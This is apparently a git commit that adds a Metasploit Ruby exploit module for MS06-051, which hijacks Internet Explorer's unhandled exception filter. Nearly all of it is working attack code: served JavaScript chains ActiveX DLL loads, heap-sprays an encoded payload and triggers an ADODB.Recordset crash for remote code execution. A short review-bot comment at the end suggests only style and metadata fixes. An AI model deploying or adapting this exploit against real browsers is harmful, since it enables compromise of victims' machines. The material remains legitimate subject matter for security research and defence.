sup
git-svn-id: file:///home/svn/framework3/trunk@3809 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
7bd26e4925
commit
86c400a8bd
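--- /dev/null
+++ b/PATH_NOT_SHOWN_ON_PAGE
@@ -0,0 +1,191 @@
+require 'msf/core'
+
+module Msf
+
+class Exploits::Private::IeUnexpFilt < Msf::Exploit::Remote
+
+include Exploit::Remote::HttpServer::Html
+
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'MS06-051 Unhandled Exception Filter Hijack',
+'Description' => %q{
+This module exploits a design error in the way that the unhandled
+exception filter chain is managed. By loading and unloading DLLs
+that register UEFs in the proper order, it is possible to cause
+the top-level unhandled exception filter to point to an invalid
+memory address. Using heap spraying techniques, it is possible
+to place attacker controlled code at the location that the top-level
+unhandled exception filter points. Generating an unhandled
+exception then leads to code execution.
+},
+'License' => MSF_LICENSE,
+'Author' =>
+[
+'skape',
+],
+'Version' => '$Revision: 1.0 $',
+'References' =>
+[
+# 0day
+],
+'Payload' =>
+{
+'Space' => 1000,
+'MaxNops' => 0
+},
+'Targets' =>
+[
+# Target 0: Automatic
+[
+'Windows NT/2000/XP/2003 Automatic',
+{
+'Platform' => 'win',
+},
+],
+],
+'DefaultTarget' => 0))
+end
+
+def on_request_uri(cli, request)
+p = payload
+
+# Re-generate the payload
+return if (request.qstring['window'].nil? and (p = regenerate_payload(cli)) == nil)
+
+hex = p.encoded.unpack('H*')[0]
+content =
+"<html><script language='javascript'>
+var w1;
+var w2;
+
+function win1()
+{
+// GBDetect is small, so we have to take steps to make sure
+// that the heap grows into the region. Therefore, we need
+// to load DLLs that will be loaded at lower addresses.
+
+// This series works reliably, but relies on vmware:
+//new ActiveXObject('vmappcfg.ProjWz.9');
+//new ActiveXObject('GBDetect.Detect');
+//new ActiveXObject('vmhwcfg.Hwz.9');
+
+// This series works reliably
+//new ActiveXObject('OPUCatalog.OPUCatalog11'); // office
+//new ActiveXObject('GBDetect.Detect'); // adobe -- trigger DLL
+//new ActiveXObject('NvCpl.NvCplLateBound'); // nvidia
+//new ActiveXObject('BarControl.GDSControl'); // realplayer
+
+// works all by itself, just need to spray better
+//new ActiveXObject('GBDetect.Detect'); // adobe -- trigger DLL
+
+// these may be useful...
+//new ActiveXObject('CDDBRealControl.CDDBControl');//realplayer
+//new ActiveXObject('CEnroll.CEnroll');
+
+// These overlap on XPSP2, not on XPSP0. msado15 is larger
+new ActiveXObject('RDS.DataControl'); // msadco
+new ActiveXObject('ADODB.Record'); // msado15
+
+// Acrobat OCX
+new ActiveXObject('GBDetect.Detect'); // adobe -- trigger DLL
+
+window.opener.open2();
+}
+
+function win2()
+{
+// Some random real player activex control that sets an unhandled
+// exception filter indirectly through another DLL.
+//new ActiveXObject('IERJCtl.IERJCtl');
+
+// Even though an object instance isn't created as a result of this,
+// the DLL associated with this COM object is still loaded, causing
+// it to register its UEF.
+try
+{
+new ActiveXObject('CompatUI.Util');
+} catch(err)
+{
+}
+
+window.opener.go();
+}
+
+function crash()
+{
+var sp1 = spray(0);
+
+// IE crash bug #134234
+a = new ActiveXObject('ADODB.Recordset');
+try { a.Filter = 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' } catch(e) { }
+try { a.Filter = 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' } catch(e) { }
+try { a.Filter = 0x7ffffffe; } catch(e) { }
+}
+
+function spray(length)
+{
+var payloadHex = \"#{hex}\";
+var payload = unescape(payloadHex.replace(/([0-9A-Fa-f]{2})([0-9A-Fa-f]{2})/g, \"%u$2$1\"));
+
+CollectGarbage();
+
+var spray = unescape('%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141');
+
+if (length == 0)
+length = 0x4000000;
+
+do
+{
+if (spray.length >= 0x10000)
+spray += payload;
+spray += spray;
+} while (spray.length < length);
+
+spray += payload;
+}
+
+function close2()
+{
+w2.close();
+setTimeout('crash();', 1000);
+}
+
+function close1()
+{
+w1.close();
+setTimeout('close2();', 1000);
+}
+
+function go()
+{
+setTimeout('close1();', 1000);
+}
+
+function open2()
+{
+w2 = window.open('#{request.resource}?window=1', 'win2');
+}
+
+if (window.opener == null)
+{
+spray(0x100000);
+
+w1 = window.open('#{request.resource}?window=1', 'win1');
+}
+else
+{
+if (window.name == 'win1')
+win1();
+else
+win2();
+}
+</script></html>";
+
+# Transmit the response to the client
+send_response(cli, content)
+end
+
+end
+
+end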
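Review bot: The guard at the top of `on_request_uri` uses `and` and `== nil` where Ruby's `&&` and `.nil?` are the idiomatic forms; `return if (request.qstring['window'].nil? and (p = regenerate_payload(cli)) == nil)` can be written `return if request.qstring['window'].nil? && (p = regenerate_payload(cli)).nil?`. The assignment buried in that condition is easy to misread, so a comment such as `# Only the opener window regenerates the payload; child windows (window=1) reuse p = payload` would make the intent explicit — that reading is inferred from the `?window=1` URLs in the served page and should be confirmed. The `'References'` array holds only a `# 0day` comment while `'Name'` already cites MS06-051; if that bulletin is the corresponding fix, an `[ 'MSB', 'MS06-051' ]` entry belongs there so the module's metadata is searchable.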
|